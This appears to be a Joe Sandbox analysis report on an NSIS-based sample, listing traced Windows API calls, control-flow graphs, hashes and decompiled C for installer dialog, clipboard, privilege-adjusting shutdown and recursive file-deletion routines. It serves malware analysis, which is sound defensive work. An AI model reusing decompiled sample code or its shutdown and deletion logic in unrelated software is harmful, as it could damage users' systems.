                                                                                      • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000020,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000000), ref: 004036D6
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                        • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000000,?), ref: 0040397C
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                      • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,ppingA,?), ref: 004039FB
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\xcVh7ZmH4Y.exe,0042AA28,00000001), ref: 00403A0E
                                                                                      • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                      • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                      • ExitProcess.KERNEL32 ref: 00403A78
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                      • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xcVh7ZmH4Y.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$ppingA$~nsu
                                                                                      • API String ID: 3859024572-2903087826
                                                                                      • Opcode ID: 407f7355e1db2ff4ffdac26900de3c672c8db91765d08a40626e51ff5d6c7f7b
                                                                                      • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                      • Opcode Fuzzy Hash: 407f7355e1db2ff4ffdac26900de3c672c8db91765d08a40626e51ff5d6c7f7b
                                                                                      • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 166 4057e4-4057e7 145->166 167 4057c8-4057e2 SendMessageW * 2 145->167 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 163 405917-40591b 154->163 161 4058f8-405904 call 404472 155->161 162 40591e-40592e ShowWindow 155->162 156->154 159 40594a-405950 156->159 159->154 168 405952-405965 SendMessageW 159->168 161->154 164 405930-405939 call 40559f 162->164 165 40593e-40593f call 404472 162->165 164->165 165->156 172 4057f7-40580e call 404499 166->172 173 4057e9-4057f5 SendMessageW 166->173 167->166 174 405a67-405a69 168->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 168->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->163 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->174 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->174 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                      C-Code - Quality: 95%
                                                                                      			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x7d1fcc
								_t57 = _t119 + 0x34; // 0xffffffd5
								E0040559F( *_t57, _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                                      0x004056e6
                                                                                      0x004056ec
                                                                                      0x004056f6
                                                                                      0x004056f9
                                                                                      0x0040588f
                                                                                      0x004058ac
                                                                                      0x004058b3
                                                                                      0x004058b3
                                                                                      0x004058c6
                                                                                      0x004058e4
                                                                                      0x004058e6
                                                                                      0x004058ee
                                                                                      0x00405944
                                                                                      0x00405948
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040594a
                                                                                      0x00405950
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040595a
                                                                                      0x00405962
                                                                                      0x00405965
                                                                                      0x00405a67
                                                                                      0x00000000
                                                                                      0x00405a67
                                                                                      0x00405974
                                                                                      0x0040597f
                                                                                      0x00405988
                                                                                      0x00405993
                                                                                      0x00405996
                                                                                      0x0040599f
                                                                                      0x004059a5
                                                                                      0x004059a8
                                                                                      0x004059a8
                                                                                      0x004059c0
                                                                                      0x004059c9
                                                                                      0x004059cc
                                                                                      0x004059d3
                                                                                      0x004059da
                                                                                      0x004059e2
                                                                                      0x004059e2
                                                                                      0x004059f9
                                                                                      0x004059f9
                                                                                      0x00405a00
                                                                                      0x00405a06
                                                                                      0x00405a12
                                                                                      0x00405a19
                                                                                      0x00405a22
                                                                                      0x00405a24
                                                                                      0x00405a27
                                                                                      0x00405a36
                                                                                      0x00405a39
                                                                                      0x00405a3f
                                                                                      0x00405a40
                                                                                      0x00405a46
                                                                                      0x00405a47
                                                                                      0x00405a48
                                                                                      0x00405a50
                                                                                      0x00405a5b
                                                                                      0x00405a61
                                                                                      0x00405a61
                                                                                      0x00000000
                                                                                      0x004059c0
                                                                                      0x004058f6
                                                                                      0x00405926
                                                                                      0x0040592e
                                                                                      0x00405930
                                                                                      0x00405936
                                                                                      0x00405939
                                                                                      0x00405939
                                                                                      0x0040593f
                                                                                      0x00000000
                                                                                      0x0040593f
                                                                                      0x004058fa
                                                                                      0x00405904
                                                                                      0x00000000
                                                                                      0x004058c8
                                                                                      0x004058ce
                                                                                      0x00405909
                                                                                      0x00000000
                                                                                      0x00405912
                                                                                      0x004058d7
                                                                                      0x004058dc
                                                                                      0x004058df
                                                                                      0x00000000
                                                                                      0x004058df
                                                                                      0x004058c6
                                                                                      0x004056ff
                                                                                      0x00405703
                                                                                      0x0040570b
                                                                                      0x0040570f
                                                                                      0x00405712
                                                                                      0x00405715
                                                                                      0x00405718
                                                                                      0x0040571b
                                                                                      0x0040571c
                                                                                      0x0040571d
                                                                                      0x00405736
                                                                                      0x00405739
                                                                                      0x00405743
                                                                                      0x00405752
                                                                                      0x0040575a
                                                                                      0x00405762
                                                                                      0x00405767
                                                                                      0x0040576a
                                                                                      0x00405776
                                                                                      0x0040577f
                                                                                      0x00405788
                                                                                      0x004057aa
                                                                                      0x004057b0
                                                                                      0x004057c1
                                                                                      0x004057c6
                                                                                      0x004057d4
                                                                                      0x004057e2
                                                                                      0x004057e2
                                                                                      0x004057e7
                                                                                      0x004057f5
                                                                                      0x004057f5
                                                                                      0x004057fa
                                                                                      0x004057fd
                                                                                      0x00405802
                                                                                      0x0040580e
                                                                                      0x00405817
                                                                                      0x00405824
                                                                                      0x00405833
                                                                                      0x00405826
                                                                                      0x0040582b
                                                                                      0x0040582b
                                                                                      0x0040583f
                                                                                      0x0040583f
                                                                                      0x00405853
                                                                                      0x0040585c
                                                                                      0x00405865
                                                                                      0x00405875
                                                                                      0x00405881
                                                                                      0x00405881
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                      • GetClientRect.USER32(?,?), ref: 00405788
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                        • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                      • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                      • ShowWindow.USER32(00000008), ref: 00405926
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                      • CreatePopupMenu.USER32 ref: 0040596B
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                      • EmptyClipboard.USER32 ref: 00405A06
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                      • CloseClipboard.USER32 ref: 00405A61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {
                                                                                      • API String ID: 590372296-366298937
                                                                                      • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                      • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                      • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                      • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 457 405cc1-405cc2 call 405e58 449->457 458 405cb4-405cbf lstrcatW 449->458 450->447 453 405dba-405dbd 450->453 451->449 451->450 455 405dc7-405dcf call 406873 453->455 456 405dbf-405dc5 453->456 455->447 466 405dd1-405de5 call 405e0c call 405c01 455->466 456->447 461 405cc7-405ccb 457->461 458->461 462 405cd7-405cdd lstrcatW 461->462 463 405ccd-405cd5 461->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->456 488 405dec-405dfb call 40559f call 4062fd 482->488 483->447 484->475 489 405d4c-405d55 call 405c49 484->489 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 488->447 489->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                                                                      C-Code - Quality: 98%
                                                                                      			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                      0x00405c53
                                                                                      0x00405c58
                                                                                      0x00405c61
                                                                                      0x00405c64
                                                                                      0x00405c6c
                                                                                      0x00405c6f
                                                                                      0x00405c72
                                                                                      0x00405c7a
                                                                                      0x00405c7c
                                                                                      0x00405c7d
                                                                                      0x00000000
                                                                                      0x00405c7d
                                                                                      0x00405c88
                                                                                      0x00405c8b
                                                                                      0x00405c8b
                                                                                      0x00405c8b
                                                                                      0x00405c8f
                                                                                      0x00405ca2
                                                                                      0x00405ca9
                                                                                      0x00405cae
                                                                                      0x00405cb2
                                                                                      0x00405cc2
                                                                                      0x00405cb4
                                                                                      0x00405cba
                                                                                      0x00405cba
                                                                                      0x00405cc7
                                                                                      0x00405ccb
                                                                                      0x00405cd7
                                                                                      0x00405cdd
                                                                                      0x00405ce2
                                                                                      0x00405ce8
                                                                                      0x00405cf3
                                                                                      0x00405cf9
                                                                                      0x00405cfb
                                                                                      0x00405cfe
                                                                                      0x00405da8
                                                                                      0x00405da8
                                                                                      0x00405dac
                                                                                      0x00405dae
                                                                                      0x00405dae
                                                                                      0x00405dae
                                                                                      0x00405dae
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d04
                                                                                      0x00405d04
                                                                                      0x00405d04
                                                                                      0x00405d0c
                                                                                      0x00405d2c
                                                                                      0x00405d34
                                                                                      0x00405d39
                                                                                      0x00405d40
                                                                                      0x00405d5b
                                                                                      0x00405d60
                                                                                      0x00405d62
                                                                                      0x00405d86
                                                                                      0x00405d64
                                                                                      0x00405d64
                                                                                      0x00405d67
                                                                                      0x00405d7b
                                                                                      0x00405d69
                                                                                      0x00405d6c
                                                                                      0x00405d74
                                                                                      0x00405d74
                                                                                      0x00405d67
                                                                                      0x00405d42
                                                                                      0x00405d48
                                                                                      0x00405d4a
                                                                                      0x00405d50
                                                                                      0x00405d50
                                                                                      0x00405d4a
                                                                                      0x00000000
                                                                                      0x00405d40
                                                                                      0x00405d0e
                                                                                      0x00405d16
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d18
                                                                                      0x00405d20
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d22
                                                                                      0x00405d2a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d8b
                                                                                      0x00405d93
                                                                                      0x00405d99
                                                                                      0x00405d99
                                                                                      0x00405da2
                                                                                      0x00000000
                                                                                      0x00405da2
                                                                                      0x00405ccd
                                                                                      0x00405cd5
